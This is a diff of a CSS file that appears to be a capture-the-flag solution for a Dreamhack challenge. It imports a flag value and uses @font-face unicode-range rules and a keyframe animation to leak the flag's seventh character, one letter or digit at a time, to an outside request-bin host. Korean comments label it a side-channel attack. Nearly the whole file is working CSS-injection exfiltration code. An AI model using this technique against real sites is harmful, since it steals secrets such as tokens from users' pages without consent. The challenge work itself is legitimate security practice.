--- a/css.css
+++ b/css.css
@@ -1,111 +1,106 @@
 @import url('http://localhost:8080/flag');
 
-/* FLAG를 body에 랜더링 */
+/* FLAG를 body에 렌더링 (7번째 문자만 표시) */
 body::after {
     content: var(--flag);
     display: block;
     font-family: rest;
     font-size: 40px;
     white-space: nowrap;
-    text-indent: -7ch; /* 특정 글자 선택 */
+    text-indent: -7ch; /* 7번째 문자 선택 */
     overflow: hidden;
+    width: 1ch;
     height: 40px;
-    animation: checkchar 3s infinite step-end;
+    animation: checkChar 72s infinite step-end;
 }
 
 /* 기본 폰트 */
-@font-face { font-family: rest; src: local('Courier New'); unicode-range: U+0-10FFFF; }
+@font-face { font-family: rest; src: local('Courier New'); }
 
-/* 0-9 */
-@font-face { font-family: has_0; src: url("https://bemxdis.request.dreamhack.games/leak?char=0"); unicode-range: U+0030; }
-@font-face { font-family: has_1; src: url("https://bemxdis.request.dreamhack.games/leak?char=1"); unicode-range: U+0031; }
-@font-face { font-family: has_2; src: url("https://bemxdis.request.dreamhack.games/leak?char=2"); unicode-range: U+0032; }
-@font-face { font-family: has_3; src: url("https://bemxdis.request.dreamhack.games/leak?char=3"); unicode-range: U+0033; }
-@font-face { font-family: has_4; src: url("https://bemxdis.request.dreamhack.games/leak?char=4"); unicode-range: U+0034; }
-@font-face { font-family: has_5; src: url("https://bemxdis.request.dreamhack.games/leak?char=5"); unicode-range: U+0035; }
-@font-face { font-family: has_6; src: url("https://bemxdis.request.dreamhack.games/leak?char=6"); unicode-range: U+0036; }
-@font-face { font-family: has_7; src: url("https://bemxdis.request.dreamhack.games/leak?char=7"); unicode-range: U+0037; }
-@font-face { font-family: has_8; src: url("https://bemxdis.request.dreamhack.games/leak?char=8"); unicode-range: U+0038; }
-@font-face { font-family: has_9; src: url("https://bemxdis.request.dreamhack.games/leak?char=9"); unicode-range: U+0039; }
+/* 숫자 0-9 */
+@font-face { font-family: has_0; src: url("https://yqycnrm.request.dreamhack.games/leak?char=0"); unicode-range: U+0030; }
+@font-face { font-family: has_1; src: url("https://yqycnrm.request.dreamhack.games/leak?char=1"); unicode-range: U+0031; }
+@font-face { font-family: has_2; src: url("https://yqycnrm.request.dreamhack.games/leak?char=2"); unicode-range: U+0032; }
+@font-face { font-family: has_3; src: url("https://yqycnrm.request.dreamhack.games/leak?char=3"); unicode-range: U+0033; }
+@font-face { font-family: has_4; src: url("https://yqycnrm.request.dreamhack.games/leak?char=4"); unicode-range: U+0034; }
+@font-face { font-family: has_5; src: url("https://yqycnrm.request.dreamhack.games/leak?char=5"); unicode-range: U+0035; }
+@font-face { font-family: has_6; src: url("https://yqycnrm.request.dreamhack.games/leak?char=6"); unicode-range: U+0036; }
+@font-face { font-family: has_7; src: url("https://yqycnrm.request.dreamhack.games/leak?char=7"); unicode-range: U+0037; }
+@font-face { font-family: has_8; src: url("https://yqycnrm.request.dreamhack.games/leak?char=8"); unicode-range: U+0038; }
+@font-face { font-family: has_9; src: url("https://yqycnrm.request.dreamhack.games/leak?char=9"); unicode-range: U+0039; }
 
-/* a-z */
-@font-face { font-family: has_a; src: url("https://bemxdis.request.dreamhack.games/leak?char=a"); unicode-range: U+0061; }
-@font-face { font-family: has_b; src: url("https://bemxdis.request.dreamhack.games/leak?char=b"); unicode-range: U+0062; }
-@font-face { font-family: has_c; src: url("https://bemxdis.request.dreamhack.games/leak?char=c"); unicode-range: U+0063; }
-@font-face { font-family: has_d; src: url("https://bemxdis.request.dreamhack.games/leak?char=d"); unicode-range: U+0064; }
-@font-face { font-family: has_e; src: url("https://bemxdis.request.dreamhack.games/leak?char=e"); unicode-range: U+0065; }
-@font-face { font-family: has_f; src: url("https://bemxdis.request.dreamhack.games/leak?char=f"); unicode-range: U+0066; }
-@font-face { font-family: has_g; src: url("https://bemxdis.request.dreamhack.games/leak?char=g"); unicode-range: U+0067; }
-@font-face { font-family: has_h; src: url("https://bemxdis.request.dreamhack.games/leak?char=h"); unicode-range: U+0068; }
-@font-face { font-family: has_i; src: url("https://bemxdis.request.dreamhack.games/leak?char=i"); unicode-range: U+0069; }
-@font-face { font-family: has_j; src: url("https://bemxdis.request.dreamhack.games/leak?char=j"); unicode-range: U+006A; }
-@font-face { font-family: has_k; src: url("https://bemxdis.request.dreamhack.games/leak?char=k"); unicode-range: U+006B; }
-@font-face { font-family: has_l; src: url("https://bemxdis.request.dreamhack.games/leak?char=l"); unicode-range: U+006C; }
-@font-face { font-family: has_m; src: url("https://bemxdis.request.dreamhack.games/leak?char=m"); unicode-range: U+006D; }
-@font-face { font-family: has_n; src: url("https://bemxdis.request.dreamhack.games/leak?char=n"); unicode-range: U+006E; }
-@font-face { font-family: has_o; src: url("https://bemxdis.request.dreamhack.games/leak?char=o"); unicode-range: U+006F; }
-@font-face { font-family: has_p; src: url("https://bemxdis.request.dreamhack.games/leak?char=p"); unicode-range: U+0070; }
-@font-face { font-family: has_q; src: url("https://bemxdis.request.dreamhack.games/leak?char=q"); unicode-range: U+0071; }
-@font-face { font-family: has_r; src: url("https://bemxdis.request.dreamhack.games/leak?char=r"); unicode-range: U+0072; }
-@font-face { font-family: has_s; src: url("https://bemxdis.request.dreamhack.games/leak?char=s"); unicode-range: U+0073; }
-@font-face { font-family: has_t; src: url("https://bemxdis.request.dreamhack.games/leak?char=t"); unicode-range: U+0074; }
-@font-face { font-family: has_u; src: url("https://bemxdis.request.dreamhack.games/leak?char=u"); unicode-range: U+0075; }
-@font-face { font-family: has_v; src: url("https://bemxdis.request.dreamhack.games/leak?char=v"); unicode-range: U+0076; }
-@font-face { font-family: has_w; src: url("https://bemxdis.request.dreamhack.games/leak?char=w"); unicode-range: U+0077; }
-@font-face { font-family: has_x; src: url("https://bemxdis.request.dreamhack.games/leak?char=x"); unicode-range: U+0078; }
-@font-face { font-family: has_y; src: url("https://bemxdis.request.dreamhack.games/leak?char=y"); unicode-range: U+0079; }
-@font-face { font-family: has_z; src: url("https://bemxdis.request.dreamhack.games/leak?char=z"); unicode-range: U+007A; }
+/* 소문자 a-z */
+@font-face { font-family: has_a; src: url("https://yqycnrm.request.dreamhack.games/leak?char=a"); unicode-range: U+0061; }
+@font-face { font-family: has_b; src: url("https://yqycnrm.request.dreamhack.games/leak?char=b"); unicode-range: U+0062; }
+@font-face { font-family: has_c; src: url("https://yqycnrm.request.dreamhack.games/leak?char=c"); unicode-range: U+0063; }
+@font-face { font-family: has_d; src: url("https://yqycnrm.request.dreamhack.games/leak?char=d"); unicode-range: U+0064; }
+@font-face { font-family: has_e; src: url("https://yqycnrm.request.dreamhack.games/leak?char=e"); unicode-range: U+0065; }
+@font-face { font-family: has_f; src: url("https://yqycnrm.request.dreamhack.games/leak?char=f"); unicode-range: U+0066; }
+@font-face { font-family: has_g; src: url("https://yqycnrm.request.dreamhack.games/leak?char=g"); unicode-range: U+0067; }
+@font-face { font-family: has_h; src: url("https://yqycnrm.request.dreamhack.games/leak?char=h"); unicode-range: U+0068; }
+@font-face { font-family: has_i; src: url("https://yqycnrm.request.dreamhack.games/leak?char=i"); unicode-range: U+0069; }
+@font-face { font-family: has_j; src: url("https://yqycnrm.request.dreamhack.games/leak?char=j"); unicode-range: U+006A; }
+@font-face { font-family: has_k; src: url("https://yqycnrm.request.dreamhack.games/leak?char=k"); unicode-range: U+006B; }
+@font-face { font-family: has_l; src: url("https://yqycnrm.request.dreamhack.games/leak?char=l"); unicode-range: U+006C; }
+@font-face { font-family: has_m; src: url("https://yqycnrm.request.dreamhack.games/leak?char=m"); unicode-range: U+006D; }
+@font-face { font-family: has_n; src: url("https://yqycnrm.request.dreamhack.games/leak?char=n"); unicode-range: U+006E; }
+@font-face { font-family: has_o; src: url("https://yqycnrm.request.dreamhack.games/leak?char=o"); unicode-range: U+006F; }
+@font-face { font-family: has_p; src: url("https://yqycnrm.request.dreamhack.games/leak?char=p"); unicode-range: U+0070; }
+@font-face { font-family: has_q; src: url("https://yqycnrm.request.dreamhack.games/leak?char=q"); unicode-range: U+0071; }
+@font-face { font-family: has_r; src: url("https://yqycnrm.request.dreamhack.games/leak?char=r"); unicode-range: U+0072; }
+@font-face { font-family: has_s; src: url("https://yqycnrm.request.dreamhack.games/leak?char=s"); unicode-range: U+0073; }
+@font-face { font-family: has_t; src: url("https://yqycnrm.request.dreamhack.games/leak?char=t"); unicode-range: U+0074; }
+@font-face { font-family: has_u; src: url("https://yqycnrm.request.dreamhack.games/leak?char=u"); unicode-range: U+0075; }
+@font-face { font-family: has_v; src: url("https://yqycnrm.request.dreamhack.games/leak?char=v"); unicode-range: U+0076; }
+@font-face { font-family: has_w; src: url("https://yqycnrm.request.dreamhack.games/leak?char=w"); unicode-range: U+0077; }
+@font-face { font-family: has_x; src: url("https://yqycnrm.request.dreamhack.games/leak?char=x"); unicode-range: U+0078; }
+@font-face { font-family: has_y; src: url("https://yqycnrm.request.dreamhack.games/leak?char=y"); unicode-range: U+0079; }
+@font-face { font-family: has_z; src: url("https://yqycnrm.request.dreamhack.games/leak?char=z"); unicode-range: U+007A; }
 
-/* 애니메이션을 이용해 모든 문자 체크 */
-@keyframes checkchar {
-  0%   { font-family: has_0; background: url("https://bemxdis.request.dreamhack.games/leak?char=0"); }
-  3%   { font-family: has_1; background: url("https://bemxdis.request.dreamhack.games/leak?char=1"); }
-  6%   { font-family: has_2; background: url("https://bemxdis.request.dreamhack.games/leak?char=2"); }
-  9%   { font-family: has_3; background: url("https://bemxdis.request.dreamhack.games/leak?char=3"); }
-  12%  { font-family: has_4; background: url("https://bemxdis.request.dreamhack.games/leak?char=4"); }
-  15%  { font-family: has_5; background: url("https://bemxdis.request.dreamhack.games/leak?char=5"); }
-  18%  { font-family: has_6; background: url("https://bemxdis.request.dreamhack.games/leak?char=6"); }
-  21%  { font-family: has_7; background: url("https://bemxdis.request.dreamhack.games/leak?char=7"); }
-  24%  { font-family: has_8; background: url("https://bemxdis.request.dreamhack.games/leak?char=8"); }
-  27%  { font-family: has_9; background: url("https://bemxdis.request.dreamhack.games/leak?char=9"); }
-  
-  /* 소문자 a-z */
-  30%  { font-family: has_a; background: url("https://bemxdis.request.dreamhack.games/leak?char=a"); }
-  33%  { font-family: has_b; background: url("https://bemxdis.request.dreamhack.games/leak?char=b"); }
-  36%  { font-family: has_c; background: url("https://bemxdis.request.dreamhack.games/leak?char=c"); }
-  39%  { font-family: has_d; background: url("https://bemxdis.request.dreamhack.games/leak?char=d"); }
-  42%  { font-family: has_e; background: url("https://bemxdis.request.dreamhack.games/leak?char=e"); }
-  45%  { font-family: has_f; background: url("https://bemxdis.request.dreamhack.games/leak?char=f"); }
-  48%  { font-family: has_g; background: url("https://bemxdis.request.dreamhack.games/leak?char=g"); }
-  51%  { font-family: has_h; background: url("https://bemxdis.request.dreamhack.games/leak?char=h"); }
-  54%  { font-family: has_i; background: url("https://bemxdis.request.dreamhack.games/leak?char=i"); }
-  57%  { font-family: has_j; background: url("https://bemxdis.request.dreamhack.games/leak?char=j"); }
-  60%  { font-family: has_k; background: url("https://bemxdis.request.dreamhack.games/leak?char=k"); }
-  63%  { font-family: has_l; background: url("https://bemxdis.request.dreamhack.games/leak?char=l"); }
-  66%  { font-family: has_m; background: url("https://bemxdis.request.dreamhack.games/leak?char=m"); }
-  69%  { font-family: has_n; background: url("https://bemxdis.request.dreamhack.games/leak?char=n"); }
-  72%  { font-family: has_o; background: url("https://bemxdis.request.dreamhack.games/leak?char=o"); }
-  75%  { font-family: has_p; background: url("https://bemxdis.request.dreamhack.games/leak?char=p"); }
-  78%  { font-family: has_q; background: url("https://bemxdis.request.dreamhack.games/leak?char=q"); }
-  81%  { font-family: has_r; background: url("https://bemxdis.request.dreamhack.games/leak?char=r"); }
-  84%  { font-family: has_s; background: url("https://bemxdis.request.dreamhack.games/leak?char=s"); }
-  87%  { font-family: has_t; background: url("https://bemxdis.request.dreamhack.games/leak?char=t"); }
-  90%  { font-family: has_u; background: url("https://bemxdis.request.dreamhack.games/leak?char=u"); }
-  93%  { font-family: has_v; background: url("https://bemxdis.request.dreamhack.games/leak?char=v"); }
-  96%  { font-family: has_w; background: url("https://bemxdis.request.dreamhack.games/leak?char=w"); }
-  97%  { font-family: has_x; background: url("https://bemxdis.request.dreamhack.games/leak?char=x"); }
-  98%  { font-family: has_y; background: url("https://bemxdis.request.dreamhack.games/leak?char=y"); }
-  99%  { font-family: has_z; background: url("https://bemxdis.request.dreamhack.games/leak?char=z"); }
-
+/* 애니메이션으로 특정 문자 감지 */
+@keyframes checkChar {
+  0% { font-family: has_0; }
+  3% { font-family: has_1; }
+  6% { font-family: has_2; }
+  9% { font-family: has_3; }
+  12% { font-family: has_4; }
+  15% { font-family: has_5; }
+  18% { font-family: has_6; }
+  21% { font-family: has_7; }
+  24% { font-family: has_8; }
+  27% { font-family: has_9; }
+  30% { font-family: has_a; }
+  33% { font-family: has_b; }
+  36% { font-family: has_c; }
+  39% { font-family: has_d; }
+  42% { font-family: has_e; }
+  45% { font-family: has_f; }
+  48% { font-family: has_g; }
+  51% { font-family: has_h; }
+  54% { font-family: has_i; }
+  57% { font-family: has_j; }
+  60% { font-family: has_k; }
+  63% { font-family: has_l; }
+  66% { font-family: has_m; }
+  69% { font-family: has_n; }
+  72% { font-family: has_o; }
+  75% { font-family: has_p; }
+  78% { font-family: has_q; }
+  81% { font-family: has_r; }
+  84% { font-family: has_s; }
+  87% { font-family: has_t; }
+  90% { font-family: has_u; }
+  93% { font-family: has_v; }
+  96% { font-family: has_w; }
+  99% { font-family: has_x; }
   100% { font-family: rest; }
 }
 
-
-/* 애니메이션으로 특정 문자가 감지될 때만 요청 발생 */
+/* 사이드채널 공격 */
 body {
     overflow-y: auto;
 }
 
 body::-webkit-scrollbar {
-    background-image: url("https://bemxdis.request.dreamhack.games/leak");
+    background-image: url("https://yqycnrm.request.dreamhack.games/leak");
 }
